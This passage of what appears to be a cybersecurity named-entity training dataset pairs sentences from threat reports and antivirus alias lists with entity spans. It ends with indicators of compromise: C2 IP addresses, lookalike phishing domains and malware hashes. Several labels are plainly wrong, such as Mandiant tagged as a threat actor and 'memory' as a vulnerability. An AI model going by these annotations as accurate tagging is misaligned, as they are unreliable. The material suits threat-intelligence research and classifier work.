known as: PUP.Optional.OpenCandy WS.Reputation.1 Trojan.DownLoader9.52502 TR/Dropper.A.23950 Win32.Troj.Undef.kcloud PE:PUF.OpenCandy!1.9DE5 Win32/Trojan.ca7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000425", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.Kykymber.P.Trojan Trojan.PWS.Onlinegames.KEGA Trojan-PWS.Win32.Kykymber.1!O PWS-OnlineGames.ke Trojan/PSW.Kykymber.kyz Win32.Trojan-PSW.OLGames.ay Infostealer.Gampass Win32/Gamepass.OQU Win.Spyware.79683-2 Trojan-PSW.Win32.Kykymber.kyz Trojan.PWS.Onlinegames.KEGA Trojan.Win32.OnLineGames.bkxdd Troj.PSW32.W.Kykymber.kyz!c Trojan.PSW.Win32.MiBao.a TrojWare.Win32.PSW.GamePass.A Trojan.PWS.Onlinegames.KEGA BehavesLike.Win32.PWSOnlineGames.pm TR/PSW.Kykymber.CD Trojan.Win32.A.PSW-Kykymber.43452[UPX] Trojan-PSW.Win32.Kykymber.kyz Trojan.PWS.Onlinegames.KEGA Trojan.PWS.Onlinegames.KEGA Win32/PSW.OnLineGames.QLR Trojan.PWS.Kykymber!KKmGLDbdY4I W32/OnLineGames.KY!tr.pws Trj/Kykymber.A Trojan.PSW.Win32.GameOnline.CP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000426", "source": "cyner2_train"}} {"text": "Recently, in our never-ending quest to protect the world from malware, we found a misbehaving Android trojan.", "spans": {"MALWARE: malware,": [[62, 70]], "MALWARE: Android trojan.": [[94, 109]]}, "info": {"id": "cyner2_train_000427", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor:Win32/Binanen.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000428", "source": "cyner2_train"}} {"text": "The stolen parameters follow : ID IMSI IMEI Phone number Operator AID Model Brand Version Build Battery percentage Wi-Fi connection state Wake time Are logs enabled ? Is the malware already set as the default SMS application ? [ True/False ] Signal strength Screen active [ True/False ] Orientation Was accessibility permission granted ? 
[ True/False ] Screen size List of the installed applications SMS messages saved on the device It is not uncommon for banking malware to harvest extensive amounts of data from the victim ’ s device .", "spans": {}, "info": {"id": "cyner2_train_000429", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod912.Trojan.1f28 Win32.Trojan.WisdomEyes.16070401.9500.9823 Trojan.Munidub TROJ64_ASRUEX.A Trojan.Win64.MLW.eelpql TROJ64_ASRUEX.A BehavesLike.Win64.CrossRider.tm W64/Trojan.MCVO-8253 Trojan/Win32.Zapchast Trojan:Win64/Asruex.A!dha Trojan.Zapchast.pk Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000431", "source": "cyner2_train"}} {"text": "POS malware refers to malicious software that extracts payment card information from memory and usually uploads that data to a command and control CnC server.", "spans": {"MALWARE: POS malware": [[0, 11]], "MALWARE: malicious software": [[22, 40]], "VULNERABILITY: memory": [[85, 91]]}, "info": {"id": "cyner2_train_000432", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.DD2BF Trojan.DownLoader.18943 BehavesLike.Win32.Msposer.nm Trj/Lozyt.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000434", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.ANU Trojan.Enrume Ransom_Enrume.R00EC0DKG17 Trojan.Ransom.ANU Trojan.Ransom.ANU Trojan.Win32.Z.Ransom.6967658 Troj.Ransom.Anu!c Trojan.Ransom.ANU Trojan.Ransom.ANU Ransom_Enrume.R00EC0DKG17 BehavesLike.Win32.PUPXBC.vc TR/FileCoder.jtxjg Trojan.Ransom.ANU Trojan.Ransom.ANU Trj/CI.A Win32/Trojan.Ransom.2a7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000435", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SapinH.Trojan Trojan-Dropper.Win32.Injector!O Trojan.Mauvaise.SL1 Trojan.Chad Trojan.Packed.Win32.29983 Trojan.Application.Symmi.D73F9 Win32/Gamepass.HKIaME Trojan-Dropper.Win32.Injector.palw 
Trojan.Win32.KillProc.brmetk Troj.Dropper.W32.Injector.toQt Adware.Win32.Dropper.aaa Application.Win32.Kuaiba.BC Trojan.KillProc.22109 BehavesLike.Win32.VirRansom.fh TrojanDropper.Injector.ayai Trojan:Win32/Scoreem.A Trojan-Dropper.Win32.Injector.palw Dropper/Win32.Injector.R68328 TrojanDropper.Injector Trojan.DR.Injector!UEnRNWldneo Trojan.Win32.Senta W32/Injector.RREW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000436", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SumanyaQZA.Worm Worm.AutoRun W32/Autorun.worm.j Worm.AutoRun.Win32.2713 TROJ_FAM_0001c56.TOMA Win32.Worm.AutoRun.d W32.SillyDC Win32/SillyFDC.CD TROJ_FAM_0001c56.TOMA Worm.Win32.AutoRun.beh Trojan.Win32.AutoRun.uvsfh Worm.Win32.Autorun.204800 Trojan.Copier.8 BehavesLike.Win32.VBObfus.dm Worm.Win32.VB Worm/AutoRun.ahnn Worm:Win32/Manyasu.A Worm/Win32.AutoRun Worm:Win32/Manyasu.A Trojan.Heur.E08BA4 Worm.Win32.AutoRun.beh Worm/Win32.AutoRun.R18800 Trojan.VBO.012000 Trj/Manyasu.A Win32/AutoRun.VB.IY Trojan.Win32.VB.mct Worm.AutoRun!WxdQD2QNztM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000437", "source": "cyner2_train"}} {"text": "The ongoing attacks attempt to circumvent the extra protections conferred by two-factor authentication in Gmail, and rely heavily on phone-call based phishing and real time login attempts by the attackers.", "spans": {"THREAT_ACTOR: attackers.": [[195, 205]]}, "info": {"id": "cyner2_train_000438", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Stub!O Backdoor/Stub.j Win32.Worm.Delf.a Backdoor.Trojan Win32/Bosbot.D BKDR_STUB.G Backdoor.Win32.Stub.j Trojan.Win32.Stub.bbeaok Backdoor.Win32.A.Stub.114843[UPX] BackDoor.Stfu Backdoor.Stub.Win32.24 BKDR_STUB.G BehavesLike.Win32.Backdoor.cm Virus.Win32.Imponex Backdoor/Stub.n W32/Sality.Patched Trojan/Win32.Unknown Backdoor:Win32/Stub.P W32.W.Bagle.kZt7 Backdoor.Win32.Stub.j Win32.Worm.Imponex.A Trojan/Win32.Stub.C408823 
BScope.Malware-Cryptor.Hlux W32/DelpDldr.A!tr.bdr W32/Knase.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000439", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Java.Adwind.dkmdei Java.Adwind.2 Trojan.Java.Adwind Trojan.Java.o JAVA/RemoteAd.dld Trojan:Java/Adwind.G Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000440", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Patched.FR Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Sheedash Win32/Sfcpatched.A TROJ_PATCH.SMLD Win.Trojan.Sfcpatch-10 Trojan.Win32.Patched.fr Trojan.Win32.Patched.cwsyqv W32.W.AutoRun.kYRk Trojan.WinSpy.921 Trojan.Patched.Win32.27797 TROJ_PATCH.SMLD Trojan.Win32.Patched Trojan/Win32.Patched Trojan.Patched.1 Trojan.Win32.Patched.fr Trojan:Win32/Parchood.A Trojan/Win32.Patched.R3621 BScope.Trojan.Crex Trojan.Win32.Patched.f Trojan.Patched!j5lr5VQfEwA Win32/Trojan.2c9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000443", "source": "cyner2_train"}} {"text": "The group has been operating since 2012 and became particularly active in Q2 2015.", "spans": {"THREAT_ACTOR: The group": [[0, 9]]}, "info": {"id": "cyner2_train_000444", "source": "cyner2_train"}} {"text": "SpyNote is similar to OmniRat and DroidJack, which are RATs remote administration tools that allow malware owners to gain remote administrative control of an Android device.", "spans": {"MALWARE: SpyNote": [[0, 7]], "MALWARE: OmniRat": [[22, 29]], "MALWARE: DroidJack,": [[34, 44]], "MALWARE: RATs remote administration tools": [[55, 87]], "THREAT_ACTOR: malware owners": [[99, 113]], "SYSTEM: Android device.": [[158, 173]]}, "info": {"id": "cyner2_train_000445", "source": "cyner2_train"}} {"text": "As predicted following the leak of Hacking Team exploit codes covered here, the Zscaler security research team has recently started seeing a Chinese cyber 
espionage group weaponizing malware payloads using the 0-day exploits found in the leaked Hacking Team archives.", "spans": {"ORGANIZATION: Hacking Team": [[35, 47], [245, 257]], "MALWARE: exploit codes": [[48, 61]], "ORGANIZATION: Zscaler security research team": [[80, 110]], "THREAT_ACTOR: Chinese cyber espionage group": [[141, 170]], "MALWARE: malware payloads": [[183, 199]], "MALWARE: 0-day exploits": [[210, 224]]}, "info": {"id": "cyner2_train_000446", "source": "cyner2_train"}} {"text": "The World Anti-Doping Agency WADA has alerted their stakeholders that email phishing scams are being reported in connection with WADA and therefore asks its recipients to be careful.", "spans": {"ORGANIZATION: The World Anti-Doping Agency WADA": [[0, 33]], "ORGANIZATION: WADA": [[129, 133]], "ORGANIZATION: recipients": [[157, 167]]}, "info": {"id": "cyner2_train_000447", "source": "cyner2_train"}} {"text": "Attackers create accounts on those services and post encoded IP addresses or the domain names of real C2 servers in advance of distributing the backdoor.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "MALWARE: backdoor.": [[144, 153]]}, "info": {"id": "cyner2_train_000448", "source": "cyner2_train"}} {"text": "A backdoor also known as: P2P-Worm.Win32.Delf!O Worm.Delf.9767 W32/Delf.ao WORM_YOOHOO.D Win32.Worm.Delf.a W32/SillyP2P.BR W32.HLLW.Yoohoo WORM_YOOHOO.D Win.Trojan.Delf-1033 P2P-Worm.Win32.Delf.ao Trojan.Win32.Delf.bojqna Win32.Worm-p2p.Delf.Lnfa Win32.HLLW.Woofka Worm.Delf.Win32.191 BehavesLike.Win32.Backdoor.ch Worm/Delf.ot Worm[P2P]/Win32.Delf Worm.Win32.A.P2P-Delf.70675[UPX] P2P-Worm.Win32.Delf.ao Win32/P2PDelf.worm.45056 Worm.Delf Win32/Delf.AO Worm.P2P.Delf.AAF!AU P2P-Worm.Win32.Delf W32/Delf.AO!worm.p2p W32/Spybot.TN.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000451", "source": "cyner2_train"}} {"text": "In February 2017, we observed an evolution of the Infy malware that we're calling Foudre lightning in French.", 
"spans": {"MALWARE: Infy malware": [[50, 62]], "MALWARE: Foudre": [[82, 88]]}, "info": {"id": "cyner2_train_000453", "source": "cyner2_train"}} {"text": "IOC's related to a new version of Citadel that hit the streets on November 2015", "spans": {"MALWARE: Citadel": [[34, 41]]}, "info": {"id": "cyner2_train_000455", "source": "cyner2_train"}} {"text": "In July 2015, Check Point's Incident Response team was contacted by a customer after they noticed strange file system activities in one of their Linux-based DNS BIND servers.", "spans": {"ORGANIZATION: Check Point's Incident Response team": [[14, 50]], "SYSTEM: Linux-based DNS BIND servers.": [[145, 174]]}, "info": {"id": "cyner2_train_000457", "source": "cyner2_train"}} {"text": "This new version CryptoWall includes multiple updates, such as a more streamlined network communication channel, modified ransom message, and the encryption of filenames.", "spans": {"MALWARE: CryptoWall": [[17, 27]]}, "info": {"id": "cyner2_train_000458", "source": "cyner2_train"}} {"text": "They can also be installed by other malware, or by exploiting software vulnerabilities.", "spans": {"MALWARE: malware,": [[36, 44]], "VULNERABILITY: exploiting software vulnerabilities.": [[51, 87]]}, "info": {"id": "cyner2_train_000459", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackdoorAPT.Hikit.MD6 BKDR64_GOALMAY.SM BKDR64_GOALMAY.SM Win.Trojan.HiKit-41 Trojan.Hikit.Win64.4 BehavesLike.Win64.PdfCrypt.cc Trojan.Dropper Backdoor:Win64/Hikiti.N!dha Trojan/Win32.HDC.C1382826 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000461", "source": "cyner2_train"}} {"text": "These attacks occurred in several different countries, but our investigation revealed that the primary targets were individuals and organizations primarily located in India.", "spans": {"ORGANIZATION: primary targets": [[95, 110]], "ORGANIZATION: individuals": [[116, 127]], "ORGANIZATION: organizations": [[132, 145]]}, "info": {"id": 
"cyner2_train_000462", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.Win32.ServStart.exsakp Trojan.Win32.Z.Servstart.15876.A Trojan.DownLoader9.26576 Trojan.Win32.Rozena TR/ServStart.dplva TrojanDownloader:Win32/Yemrok.A W32/Parite.dam W32/ServStart.DV!tr Win32/Trojan.849", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000463", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/VB.l Trojan.Heur.EC3E8C WORM_ZAKA.AD W32/VB.UQEY-1535 W32.HLLW.Asterz.intd WORM_ZAKA.AD Win.Worm.VB-29 P2P-Worm.Win32.VB.l Trojan.Win32.VB.hxbs Worm.Win32.P2P-VB.24576.D W32.W.VB.l!c Win32.VB.L Win32.HLLW.Kirk.24576 Worm.VB.Win32.51 BehavesLike.Win32.Virus.mz Trojan-Banker.Win32.Bancos W32/VB.KA@p2p Worm/VB.qvg Worm:Win32/Icasur.Q WORM/VB.A Worm[P2P]/Win32.VB Worm.P2PVB.a.kcloud Worm:Win32/Icasur.Q P2P-Worm.Win32.VB.l Worm.VB Win32/VB.L Win32.Virus.Vb.Lkdy Worm.P2P.Zaka.R W32/VB.L!worm.p2p", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000464", "source": "cyner2_train"}} {"text": "Throughout 2015, Symantec.cloud has been detecting a stream of emails that have the Xtreme remote access Trojan RAT, which we detect as W32.Extrat, as an attachment.", "spans": {"ORGANIZATION: Symantec.cloud": [[17, 31]], "MALWARE: Xtreme remote access Trojan RAT,": [[84, 116]], "ORGANIZATION: attachment.": [[154, 165]]}, "info": {"id": "cyner2_train_000465", "source": "cyner2_train"}} {"text": "In November 2016, we observed the reemergence of destructive attacks associated with the 2012 Shamoon attack campaign.", "spans": {"THREAT_ACTOR: Shamoon attack campaign.": [[94, 118]]}, "info": {"id": "cyner2_train_000466", "source": "cyner2_train"}} {"text": "This malware masquerades as typical ransomware: it encrypts the data on the computer and demands $300 bitcoins for recovery.", "spans": {"MALWARE: malware": [[5, 12]], "MALWARE: ransomware:": [[36, 47]], "SYSTEM: computer": [[76, 84]]}, "info": {"id": 
"cyner2_train_000467", "source": "cyner2_train"}} {"text": "TREASUREHUNT enumerates running processes, extracts payment card information from memory, and then transmits this information to a command and control server.", "spans": {"MALWARE: TREASUREHUNT": [[0, 12]]}, "info": {"id": "cyner2_train_000468", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Androm Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.CFAT-3750 Trojan.MulDrop7.39399 Backdoor.Androm.tas Trojan[Backdoor]/Win32.Androm Trojan:Win32/Lamooc.A Trojan/Win32.Androm.C2185535 Backdoor.Androm Trj/GdSda.A Backdoor.Androm!dAFAsy80jho", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000470", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Comfoo.a Backdoor.Vinself TROJ_COMFOO.AI Trojan.PWS.DPD.14 TROJ_COMFOO.AI Trojan[Dropper]/Win32.Injector Backdoor:Win32/Comfoo.C Win-Trojan/Comfoo.114688 Backdoor.Win32.Comfoo W32/PWS_y.AI!tr Win32/Trojan.3fc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000473", "source": "cyner2_train"}} {"text": "In October we saw an increase in infections.", "spans": {}, "info": {"id": "cyner2_train_000474", "source": "cyner2_train"}} {"text": "TeslaCrypt/AlphaCrypt uses AES256 encryption.", "spans": {}, "info": {"id": "cyner2_train_000475", "source": "cyner2_train"}} {"text": "The principles of this bootkit's work, named HDRoot, have been described in the first part of our article.", "spans": {"MALWARE: bootkit's": [[23, 32]]}, "info": {"id": "cyner2_train_000476", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Stepaik.A Worm.Stepaik Win32.Stepaik.A W32/Trojan.ILKV-7384 Win32.Stepaik.A Email-Worm.Win32.Stepaik.c Win32.Stepaik.A Email.Worm.W32!c Win32.Stepaik.A Win32.Stepaik.A Trojan.Inject3.836 BehavesLike.Win32.Virut.mh Worm[Email]/Win32.Stepaik Email-Worm.Win32.Stepaik.c Win32.Stepaik.A Trj/CI.A Win32.Worm-email.Stepaik.Day Worm.Win32.Stepar W32/Stepaik.C@mm 
Win32/Trojan.7ee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000478", "source": "cyner2_train"}} {"text": "We setup a system with weak and default passwords to capture any and all malware spread in this fashion.", "spans": {"SYSTEM: system": [[11, 17]], "MALWARE: malware": [[73, 80]]}, "info": {"id": "cyner2_train_000479", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.5B9D Packer.Malware.NSAnti.A Packer.Malware.NSAnti.A Trojan.MalPack.NSPack Trojan/PornoBlocker.afxh Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Packed.NsAnti Packer.Malware.NSAnti.A Packed.Win32.NSAnti.r Packer.Malware.NSAnti.A Trojan.Win32.NSAnti.fthc Packer.Malware.NSAnti.A BackDoor.Singu Packed.NSAnti.frd Packer.Malware.NSAnti.A Packed.Win32.NSAnti.r Trojan:Win32/Vanti.B.dll Trojan/Win32.Hupigon.C134220 TScope.Malware-Cryptor.SB Rootkit.Win32.Vanti.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000480", "source": "cyner2_train"}} {"text": "The ransomware makes this connection presumably to report that your computer has been compromised.", "spans": {"MALWARE: ransomware": [[4, 14]], "SYSTEM: computer": [[68, 76]], "VULNERABILITY: compromised.": [[86, 98]]}, "info": {"id": "cyner2_train_000482", "source": "cyner2_train"}} {"text": "This attack took advantage of a Java zero-day exploit and used hacked forums as watering holes.", "spans": {"SYSTEM: Java": [[32, 36]], "MALWARE: zero-day exploit": [[37, 53]]}, "info": {"id": "cyner2_train_000483", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.QPassHV.Trojan Trojan.Zenshirsh.SL7 Trojan/QQPass.owd Win32.Trojan-PSW.QQPass.af Win32/Oflwr.A!crypt Trojan.Win32.Scar.oetk Trojan.Win32.DangerousObject.dnizrq Win32.Trojan.Scar.Wsts TrojWare.Win32.PWS.QQPass.AZF Trojan.DownLoader12.31656 Trojan.QQPass.Win32.24405 BehavesLike.Win32.Trojan.nc TR/PSW.QQSteal.boeu Trojan.Win32.Z.Qqpass.100934 Trojan.Scar Win32/PSW.QQPass.OWD Win32/Worm.Scar.B", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000484", "source": "cyner2_train"}} {"text": "Throughout the year, Bankbot has been distributed as benign apps, some of which made their way onto popular app stores.", "spans": {"MALWARE: Bankbot": [[21, 28]], "SYSTEM: benign apps,": [[53, 65]], "SYSTEM: popular app stores.": [[100, 119]]}, "info": {"id": "cyner2_train_000485", "source": "cyner2_train"}} {"text": "In June 2022, Mandiant Managed Defense detected and responded to an UNC2970 phishing campaign targeting a U.S.-based technology company.", "spans": {"THREAT_ACTOR: Mandiant": [[14, 22]], "ORGANIZATION: Defense": [[31, 38]], "THREAT_ACTOR: UNC2970 phishing campaign": [[68, 93]], "ORGANIZATION: a U.S.-based technology company.": [[104, 136]]}, "info": {"id": "cyner2_train_000486", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.NSIS.Androm.7 Ransom.Onion.A Win32.Trojan.Injector.je Packed.NSISPacker!g7 Win32/Injector.CXKV TROJ_GE.F5258674 Zum.Ransom.NSIS.Cerber.1 Trojan.NSIS.Androm.7 Trojan.Win32.CXKV.ecdllh Trojan.Kovter.118 BehavesLike.Win32.Ransom.dc Trojan.Win32.Injector Trojan/Win32.Injector.cxkv Zum.Ransom.NSIS.Cerber.1 Trojan/Win32.Cerber.R180093 Trojan.Injector!M8gUkRYeGG8 W32/Injector.CXKV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000489", "source": "cyner2_train"}} {"text": "It appears the same actor developed both the Komplex and XAgentOSX tools, based on similarities within the following project paths found within the tools.", "spans": {"THREAT_ACTOR: actor": [[20, 25]], "MALWARE: Komplex": [[45, 52]], "MALWARE: XAgentOSX tools,": [[57, 73]], "MALWARE: tools.": [[148, 154]]}, "info": {"id": "cyner2_train_000490", "source": "cyner2_train"}} {"text": "The construction of the webshell was interesting by itself, as it was actually two separate webshells: an initial webshell that was responsible for saving and loading the second fully functional webshell.", "spans": 
{"MALWARE: webshell": [[24, 32], [114, 122]], "MALWARE: webshells:": [[92, 102]], "MALWARE: webshell.": [[195, 204]]}, "info": {"id": "cyner2_train_000491", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hacktool.Flystudio.16558 Trojan.DownLoader12.49203 Trojan-Downloader.Win32.Raykmerd Trojan/Badur.jao TR/Dldr.Raykmerd.amotd TrojanDownloader:Win32/Raykmerd.A Trojan.Badur", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000492", "source": "cyner2_train"}} {"text": "On September 18, 2015, we saw an activity on koreatimes.com where we captured a malicious binary.", "spans": {"MALWARE: malicious binary.": [[80, 97]]}, "info": {"id": "cyner2_train_000493", "source": "cyner2_train"}} {"text": "These innovations included two significant changes in Dyre behavior:", "spans": {"MALWARE: Dyre": [[54, 58]]}, "info": {"id": "cyner2_train_000498", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FlameF.Worm Trojan.Flame.B Worm.Win32.Flame!O Worm.Flamea Worm.Win32.Flame.a Trojan/Flamer.a Win32.Trojan.WisdomEyes.16070401.9500.9790 W32/Flamer.A W32.Flamer Win32/Flame.A WORM_FLAMER.A Win.Worm.Flame-9 Trojan.Flame.B Worm.Win32.Flame.a Trojan.Flame.B Trojan.Win32.Flame.sbruw W32.W.Flame.a!c Win32.Worm.Flame.Wpjf Worm.Win32.Flame.a Trojan.Flame.B Win32.HLLW.Flame.1 Worm.Flame.Win32.3 WORM_FLAMER.A W32/Flamer.OWIT-2039 Worm/Flame.f W32.Worm.Flame TR/Flamer.A.1 Worm/Win32.Flame Trojan.Flame.B Worm.Win32.Flame.1721856 Worm.Win32.Flame.a Win-Trojan/Flamer.1721856 Worm.Flame Worm.Win32.Flame.a Trojan.Flame.B Win32/Flamer.A Trojan.Flame.A Worm.Win32.Flame W32/Flame.A!worm Trojan.Flame.3535 W32/Flamer.A.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000499", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojandropper.Exebundle2X Worm.WBNA.Win32.421402 Win.Worm.Drefir-14 Trojan.Win32.ExeBundle.exrqtj Trojan.Win32.Z.Exebundle.8609956 Trojan.MulDrop.1611 W32/Trojan.EGST-2925 
TR/ExeBundle.272 Trojan[Downloader]/Win32.Small TrojanDropper:Win32/ExeBundle_2x.A Trojan.MulDrop Trj/CI.A Trojan.Dropper W32/Multidr.FD!tr Win32/Trojan.852", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000501", "source": "cyner2_train"}} {"text": "Our friends over at Bellingcat, which conducts open source investigations and writes extensively on Russia-related issues, recently shared a new tranche of spear-phishing emails they had received.", "spans": {"ORGANIZATION: Bellingcat,": [[20, 31]]}, "info": {"id": "cyner2_train_000503", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojWare.Win32.ChePro.RHZ TrojanDownloader:Win32/Hormelex.B Trojan/Win32.ChePro Trojan.Win32.Delf.PQD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000504", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Startsurf not-a-virus:AdWare.Win32.StartSurf.azas Riskware.Win32.StartSurf.expyou Adware.StartSurf.Win32.40359 BehavesLike.Win32.Dropper.jc TR/Drop.Kaymundler.bldbf Trojan.Application.Strictor.D1C262 Trojan.Win32.Z.Strictor.687398 not-a-virus:AdWare.Win32.StartSurf.azas TrojanDropper:Win32/Kaymundler.C PUP/Win32.OutBrowse.R215127 Adware.StartSurf RiskWare.Patcher Trj/CI.A Win32.Adware.Startsurf.Llhl PUA.StartSurf! 
Trojan-Dropper.Kaymundler Win32/Application.064", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000505", "source": "cyner2_train"}} {"text": "The attacks employed PlugX, a Remote Access Trojan RAT widely used in targeted attacks.", "spans": {"MALWARE: PlugX, a Remote Access Trojan RAT": [[21, 54]]}, "info": {"id": "cyner2_train_000506", "source": "cyner2_train"}} {"text": "AdWind, also known as Frutas, UNRECOM, AlienSpy, and JSocket, is a Java-based RAT.", "spans": {"MALWARE: AdWind,": [[0, 7]], "MALWARE: Frutas, UNRECOM, AlienSpy,": [[22, 48]], "MALWARE: JSocket,": [[53, 61]], "MALWARE: Java-based RAT.": [[67, 82]]}, "info": {"id": "cyner2_train_000507", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9537 BehavesLike.Win32.AdwareWajam.rc Trojan:Win32/WebHijack.A!dll", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000509", "source": "cyner2_train"}} {"text": "On March 4, we detected that the Transmission BitTorrent ailient installer for OS X was infected with ransomware, just a few hours after installers were initially posted.", "spans": {"SYSTEM: OS X": [[79, 83]], "MALWARE: ransomware,": [[102, 113]]}, "info": {"id": "cyner2_train_000511", "source": "cyner2_train"}} {"text": "The ransom payment is typically collected using a form of crypto-currency, such as Bitcoin.", "spans": {}, "info": {"id": "cyner2_train_000513", "source": "cyner2_train"}} {"text": "Whilst we would prefer to disassociate ourselves with APT attacks against Governments our interest was piqued by a particular blog written by our friends over at TrendMicro", "spans": {"THREAT_ACTOR: APT": [[54, 57]], "ORGANIZATION: Governments": [[74, 85]], "ORGANIZATION: TrendMicro": [[162, 172]]}, "info": {"id": "cyner2_train_000514", "source": "cyner2_train"}} {"text": "Since January 2016, a financially motivated threat actor whom Proofpoint has been tracking as TA530 has been targeting executives and 
other high-level employees, often through campaigns focused exclusively on a particular vertical.", "spans": {"THREAT_ACTOR: threat actor": [[44, 56]], "ORGANIZATION: Proofpoint": [[62, 72]], "THREAT_ACTOR: TA530": [[94, 99]], "ORGANIZATION: executives": [[119, 129]], "ORGANIZATION: high-level employees,": [[140, 161]], "THREAT_ACTOR: campaigns": [[176, 185]]}, "info": {"id": "cyner2_train_000515", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Injector.Win32.85625 Trojan/Injector.oqf Win32.Trojan.WisdomEyes.16070401.9500.9619 TSPY_INJECTOR_BL210174.TOMC Trojan.Win32.Inject.efoq Trojan.Win32.Inject.dzombd Trojan.Win32.A.Inject.172053 TSPY_INJECTOR_BL210174.TOMC BehavesLike.Win32.Injector.cc Win32.Malware Trojan/Inject.amig TR/Injector.10.12 Trojan/Win32.Inject Trojan:Win32/Meteit.D Trojan.Win32.Inject.efoq Trojan/Win32.VBKrypt.R27475 Trojan.Inject Win32.Trojan.Inject.Htma", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000516", "source": "cyner2_train"}} {"text": "IoCs C & C 100.51.100.00 108.62.118.131 172.81.134.165 172.86.120.207 185.212.128.152 185.212.128.192 185.61.000.108 185.61.138.108 185.61.138.37 188.209.52.101 5.206.225.57 alr992.date avito-app.pw backfround2.pw background1.xyz blacksolider93.com blass9g087.com brekelter2.com broplar3hf.xyz buy-youla.ru cd78cg210xy0.com copsoiteess.com farmatefc93.org firstclinsop.com holebrhuhh3.com holebrhuhh45.com karambga3j.net le22999a.pw leboncoin-bk.top leboncoin-buy.pw leboncoin-cz.info leboncoin-f.pw leboncoin-jp.info leboncoin-kp.top leboncoin-ny.info leboncoin-ql.top leboncoin-tr.info myyoula.ru sell-avito.ru sell-youla.ru sentel8ju67.com subito-li.pw subitop.pw web-gumtree.com whitehousejosh.com whitekalgoy3.com youlaprotect.ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa 54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe 
